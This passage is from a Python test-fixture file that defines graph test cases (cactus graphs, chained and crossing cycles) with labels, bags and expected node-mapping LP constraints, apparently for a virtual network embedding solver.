i5, i6 TWO_CYCLES_CONNECTED_WITH_SINGLE_EDGE = { "tags": {"cactus"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i3"), ("i3", "i4"), ("i4", "i5"), ("i4", "i6"), ("i5", "i6"), ], "labels": { "i1": {"i3"}, "i2": {"i3"}, "i3": {"i3"}, "i4": {"i6"}, "i5": {"i6"}, "i6": {"i6"}, } } # i3 should propagate to i1, i2, i3 # i5 should propagate to i3, i4, i5 TWO_CYCLES_CONNECTED_DIRECTLY = { "tags": {"cactus", "bags"}, "nodes": [ "i1", "i2", "i3", "i4", "i5" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i3"), ("i3", "i4"), ("i3", "i5"), ("i4", "i5"), ], "labels": { "i1": {"i3"}, "i2": {"i3"}, "i3": {"i3", "i5"}, "i4": {"i5"}, "i5": {"i5"}, }, "bags": { "i1": {frozenset(["i3"]): {("i1", "i2"), ("i1", "i3")}}, "i2": {frozenset(["i3"]): {("i2", "i3")}}, "i3": {frozenset(["i5"]): {("i3", "i4"), ("i3", "i5")}}, "i4": {frozenset(["i5"]): {("i4", "i5")}}, "i5": {frozenset(): set()}, }, } # i4 should propagate to i1, i2, i3, i4 # i7 should propagate to i4, i5, i6, i7 # i10 should propagate to i4, i8, i9, i10 THREE_CYCLES_CONNECTED_DIRECTLY = { "tags": {"cactus", "bags", "node_mapping_constraints"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6", "i7", "i8", "i9", "i10" ], "edges": [ # circle 1 ("i1", "i2"), ("i1", "i3"), ("i2", "i4"), ("i3", "i4"), # circle 2 ("i4", "i5"), ("i4", "i6"), ("i5", "i7"), ("i6", "i7"), # circle 3 ("i4", "i8"), ("i4", "i9"), ("i8", "i10"), ("i9", "i10"), ], "labels": { "i1": {"i4"}, "i2": {"i4"}, "i3": {"i4"}, "i4": {"i4", "i7", "i10"}, "i5": {"i7"}, "i6": {"i7"}, "i7": {"i7"}, "i8": {"i10"}, "i9": {"i10"}, "i10": {"i10"}, }, "bags": { "i1": {frozenset(["i4"]): {("i1", "i2"), ("i1", "i3")}}, "i2": {frozenset(["i4"]): {("i2", "i4")}}, "i3": {frozenset(["i4"]): {("i3", "i4")}}, "i4": {frozenset(["i7"]): {("i4", "i5"), ("i4", "i6")}, frozenset(["i10"]): {("i4", "i8"), ("i4", "i9")}}, "i5": {frozenset(["i7"]): {("i5", "i7")}}, "i6": {frozenset(["i7"]): {("i6", "i7")}}, "i7": {frozenset(): set()}, "i8": {frozenset(["i10"]): {("i8", "i10")}}, "i9": {frozenset(["i10"]): {("i9", "i10")}}, "i10": {frozenset(): set()}, }, "assumed_root": "i1", "ignore_bfs": True, "assumed_allowed_nodes": { "i1": ["u"], "i2": ["v"], "i3": ["u"], "i4": ["u", "v"], "i5": ["u"], "i6": ["u"], "i7": ["u", "w"], "i8": ["w"], "i9": ["v"], "i10": ["v", "w"], }, "constraints": { "node_mapping": { ("node_mapping_aggregation_req[{req_name}]_vnode[i1]_snode[u]_bag[i4]", ( (-1.0, "node_agg_var", ("i1", "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i2]_snode[v]_bag[i4]", ( (-1.0, "node_agg_var", ("i2", "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i3]_snode[u]_bag[i4]", ( (-1.0, "node_agg_var", ("i3", "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[u]_bag[i7]", ( (-1.0, "node_agg_var", ("i4", "u")), (1.0, "node_mapping_var", ("i4", frozenset([("i7", "u")]), "u")), (1.0, "node_mapping_var", ("i4", frozenset([("i7", "w")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[v]_bag[i7]", ( (-1.0, "node_agg_var", ("i4", "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i7", "u")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i7", "w")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[u]_bag[i10]", ( (-1.0, "node_agg_var", ("i4", "u")), (1.0, "node_mapping_var", ("i4", frozenset([("i10", "v")]), "u")), (1.0, "node_mapping_var", ("i4", frozenset([("i10", "w")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[v]_bag[i10]", ( (-1.0, "node_agg_var", ("i4", "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i10", "v")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i10", "w")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i5]_snode[u]_bag[i7]", ( (-1.0, "node_agg_var", ("i5", "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i7", "u")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i7", "w")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i6]_snode[u]_bag[i7]", ( (-1.0, "node_agg_var", ("i6", "u")), (1.0, "node_mapping_var", ("i6", frozenset([("i7", "u")]), "u")), (1.0, "node_mapping_var", ("i6", frozenset([("i7", "w")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i7]_snode[u]_bag[]", ( (-1.0, "node_agg_var", ("i7", "u")), (1.0, "node_mapping_var", ("i7", frozenset(), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i7]_snode[w]_bag[]", ( (-1.0, "node_agg_var", ("i7", "w")), (1.0, "node_mapping_var", ("i7", frozenset(), "w")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i8]_snode[w]_bag[i10]", ( (-1.0, "node_agg_var", ("i8", "w")), (1.0, "node_mapping_var", ("i8", frozenset([("i10", "v")]), "w")), (1.0, "node_mapping_var", ("i8", frozenset([("i10", "w")]), "w")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i9]_snode[v]_bag[i10]", ( (-1.0, "node_agg_var", ("i9", "v")), (1.0, "node_mapping_var", ("i9", frozenset([("i10", "v")]), "v")), (1.0, "node_mapping_var", ("i9", frozenset([("i10", "w")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i10]_snode[v]_bag[]", ( (-1.0, "node_agg_var", ("i10", "v")), (1.0, "node_mapping_var", ("i10", frozenset(), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i10]_snode[w]_bag[]", ( (-1.0, "node_agg_var", ("i10", "w")), (1.0, "node_mapping_var", ("i10", frozenset(), "w")), )), ##### ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_u]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_v]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "v")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_u]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_v]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "v")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_u]_bag[i4]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_v]_bag[i4]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i4')]_comm_index[i4_u]", ( (-1.0, "source_var", (('i2', 'i4'), frozenset([("i4", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i4')]_comm_index[i4_v]", ( (-1.0, "source_var", (('i2', 'i4'), frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v")]), "v")), )), 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("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i10]_snode[v]_vedge[('i9','i10')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i9', 'i10'), frozenset([("i10", "v")]), "v")), (1.0, "node_mapping_var", ("i10", frozenset(), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i10]_snode[w]_vedge[('i9','i10')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i9', 'i10'), frozenset([("i10", "w")]), "w")), (1.0, "node_mapping_var", ("i10", frozenset(), "w")), )), } } } # i4 should propagate to i1, i2, i3, i4 # i7 should propagate to i4, i5, i6, i7 # i10 should propagate to i7, i8, i9, i10 THREE_CYCLES_CONNECTED_CHAINED = { "tags": {"cactus", "bags"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6", "i7", "i8", "i9", "i10" ], "edges": [ # circle 1 ("i1", "i2"), ("i1", "i3"), ("i2", "i4"), ("i3", "i4"), # circle 2 ("i4", "i5"), ("i4", "i6"), ("i5", "i7"), ("i6", "i7"), # circle 3 ("i7", "i8"), ("i7", "i9"), ("i8", "i10"), ("i9", "i10"), ], "labels": { "i1": {"i4"}, "i2": {"i4"}, "i3": {"i4"}, "i4": {"i4", "i7"}, "i5": {"i7"}, "i6": {"i7"}, "i7": {"i7", "i10"}, "i8": {"i10"}, "i9": {"i10"}, "i10": {"i10"}, }, "bags": { "i1": {frozenset(["i4"]): {("i1", "i2"), ("i1", "i3")}}, "i2": {frozenset(["i4"]): {("i2", "i4")}}, "i3": {frozenset(["i4"]): {("i3", "i4")}}, "i4": {frozenset(["i7"]): {("i4", "i5"), ("i4", "i6")}}, "i5": {frozenset(["i7"]): {("i5", "i7")}}, "i6": {frozenset(["i7"]): {("i6", "i7")}}, "i7": {frozenset(["i10"]): {("i7", "i8"), ("i7", "i9")}}, "i8": {frozenset(["i10"]): {("i8", "i10")}}, "i9": {frozenset(["i10"]): {("i9", "i10")}}, "i10": {frozenset(): set()}, }, } CYCLE_ON_CYCLE_1 = { "tags": {"multiple_labels", "bags", "node_mapping_constraints"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i6"), ("i3", "i4"), ("i3", "i5"), ("i4", "i5"), ("i5", "i6"), ], "labels": { "i1": {"i6"}, "i2": {"i6"}, "i3": {"i5", "i6"}, "i4": {"i5", "i6"}, "i5": {"i5", "i6"}, "i6": {"i6"}, }, "bags": { "i1": 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(1.0, "node_mapping_var", ("i6", frozenset(), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[w]_vedge[('i2','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i2', 'i6'), frozenset([("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i6", frozenset(), "w")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[u]_vedge[('i5','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i5', 'i6'), frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i6", frozenset(), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[w]_vedge[('i5','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i5', 'i6'), frozenset([("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i6", frozenset(), "w")), )), } } } CYCLE_ON_CYCLE_2 = { "tags": {"multiple_labels", "bags"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i4"), ("i3", "i5"), ("i4", "i5"), ("i4", "i6"), ("i5", "i6"), ], "labels": { "i1": {"i5", "i6"}, "i2": {"i5", "i6"}, "i3": {"i5", "i6"}, "i4": {"i5", "i6"}, "i5": {"i5", "i6"}, "i6": {"i6"}, }, "bags": { "i1": {frozenset(["i5", "i6"]): {("i1", "i2"), ("i1", "i3")}}, "i2": {frozenset(["i5", "i6"]): {("i2", "i4")}}, "i3": {frozenset(["i5", "i6"]): {("i3", "i5")}}, "i4": {frozenset(["i5", "i6"]): {("i4", "i5"), ("i4", "i6")}}, "i5": {frozenset(["i6"]): {("i5", "i6")}}, "i6": {frozenset(): set()}, }, } CYCLE_ON_CYCLE_3 = { "tags": set(), "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i4"), ("i3", "i6"), ("i4", "i5"), ("i4", "i6"), ("i5", "i6"), ], "labels": { "i1": {"i6"}, "i2": {"i6"}, "i3": {"i6"}, "i4": {"i6"}, "i5": {"i6"}, "i6": {"i6"}, } } CYCLE_ON_CYCLE_4 = { "tags": {"bags"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6", "i7", "i8" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i8"), ("i3", "i4"), ("i3", "i5"), ("i4", "i5"), ("i5", "i6"), ("i5", "i7"), ("i6", "i7"), ("i7", "i8"), ], "labels": { "i1": {"i8"}, "i2": {"i8"}, "i3": {"i5", "i8"}, "i4": {"i5", "i8"}, "i5": {"i5", "i7", "i8"}, "i6": {"i7", "i8"}, "i7": {"i7", "i8"}, "i8": {"i8"}, }, "bags": { "i1": {frozenset(["i8"]): {("i1", "i2"), ("i1", "i3")}}, "i2": {frozenset(["i8"]): {("i2", "i8")}}, "i3": {frozenset(["i5", "i8"]): {("i3", "i4"), ("i3", "i5")}}, "i4": {frozenset(["i5", "i8"]): {("i4", "i5")}}, "i5": {frozenset(["i7", "i8"]): {("i5", "i6"), ("i5", "i7")}}, "i6": {frozenset(["i7", "i8"]): {("i6", "i7")}}, "i7": {frozenset(["i8"]): {("i7", "i8")}}, "i8": {frozenset(): set()}, }, } CYCLES_CROSSING = { "tags": {"multiple_labels", "bags", "node_mapping_constraints", "decomposition"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i4"), ("i2", "i5"), ("i3", "i4"), ("i3", "i5"), ("i4", "i6"), ("i5", "i6"), ], "labels": { "i1": {"i4", "i5", "i6"}, "i2": {"i4", "i5", "i6"}, "i3": {"i4", "i5", "i6"}, "i4": {"i4", "i6"}, "i5": {"i5", "i6"}, "i6": {"i6"}, }, "bags": { "i1": {frozenset(["i4", "i5", "i6"]): {("i1", "i2"), ("i1", "i3")}}, "i2": {frozenset(["i4", "i5", "i6"]): {("i2", "i4"), ("i2", "i5")}}, "i3": {frozenset(["i4", "i5", "i6"]): {("i3", "i4"), ("i3", "i5")}}, "i4": {frozenset(["i6"]): {("i4", "i6")}}, "i5": {frozenset(["i6"]): {("i5", "i6")}}, "i6": {frozenset(): set()}, }, "assumed_root": "i1", "ignore_bfs": True, "assumed_allowed_nodes": { "i1": ["u"], "i2": ["v"], "i3": ["u"], "i4": ["v", "w"], "i5": ["u", "v"], "i6": ["u", "w"], }, "constraints": { "node_mapping": { ("node_mapping_aggregation_req[{req_name}]_vnode[i1]_snode[u]_bag[i4_i5_i6]", ( (-1.0, "node_agg_var", ("i1", "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i2]_snode[v]_bag[i4_i5_i6]", ( (-1.0, "node_agg_var", ("i2", "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i3]_snode[u]_bag[i4_i5_i6]", ( (-1.0, "node_agg_var", ("i3", "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[v]_bag[i6]", ( (-1.0, "node_agg_var", ("i4", "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "w")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[w]_bag[i6]", ( (-1.0, "node_agg_var", ("i4", "w")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "u")]), "w")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "w")]), "w")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i5]_snode[u]_bag[i6]", ( (-1.0, "node_agg_var", ("i5", "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "w")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i5]_snode[v]_bag[i6]", ( (-1.0, "node_agg_var", ("i5", "v")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "w")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i6]_snode[u]_bag[]", ( (-1.0, "node_agg_var", ("i6", "u")), (1.0, "node_mapping_var", ("i6", frozenset(), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i6]_snode[w]_bag[]", ( (-1.0, "node_agg_var", ("i6", "w")), (1.0, "node_mapping_var", ("i6", frozenset(), "w")), )), # i1, u, i1 -> i2 ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_v__i5_u__i6_u]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_v__i5_u__i6_w]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_v__i5_v__i6_u]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_v__i5_v__i6_w]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_w__i5_u__i6_u]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_w__i5_u__i6_w]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_w__i5_v__i6_u]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_w__i5_v__i6_w]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i1, u, i1 -> i3 ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_v__i5_u__i6_u]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_v__i5_u__i6_w]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_v__i5_v__i6_u]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_v__i5_v__i6_w]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_w__i5_u__i6_u]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_w__i5_u__i6_w]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_w__i5_v__i6_u]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i4_w__i5_v__i6_w]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i2, v, i1 -> i2 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_v__i5_u__i6_u]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_v__i5_u__i6_w]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_v__i5_v__i6_u]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_v__i5_v__i6_w]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_w__i5_u__i6_u]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_w__i5_u__i6_w]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_w__i5_v__i6_u]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_w__i5_v__i6_w]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i2'), 